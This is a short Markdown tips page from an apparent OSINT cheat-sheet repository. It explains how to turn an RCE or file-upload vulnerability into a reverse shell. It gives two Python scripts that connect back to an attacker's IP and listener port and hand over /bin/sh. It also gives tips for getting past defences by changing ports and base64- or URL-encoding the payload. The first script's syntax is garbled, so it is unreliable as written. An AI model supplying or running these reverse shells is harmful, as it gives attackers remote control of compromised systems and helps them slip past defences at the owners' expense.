mirror of
https://github.com/Jieyab89/OSINT-Cheat-sheet.git
synced 2025-12-31 23:15:38 -08:00
37 lines
1.1 KiB
Markdown
37 lines
1.1 KiB
Markdown
# TIPS
|
|
|
|
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
|
|
|
|
1. Make sure the target has internet access (internet access opened)
|
|
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
|
3. Encode your script using base64 and then decode it 3.
|
|
4. Encode your script using url encode
|
|
|
|
## Script 1
|
|
|
|
```
|
|
socket=_import("socket");os=import("os");pty=import_("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR IP>",<PORT LISTENER>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
|
|
```
|
|
|
|
## Script 2
|
|
|
|
```
|
|
import socket
|
|
import subprocess
|
|
import os
|
|
|
|
def back_connect(host, port):
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((host, port))
|
|
os.dup2(s.fileno(), 0)
|
|
os.dup2(s.fileno(), 1)
|
|
os.dup2(s.fileno(), 2)
|
|
|
|
subprocess.call(["/bin/sh", "-i"])
|
|
|
|
host = "<YOUR IP>"
|
|
port = <YOUR LISTENER PORT>
|
|
|
|
back_connect(host, port)
|
|
```
|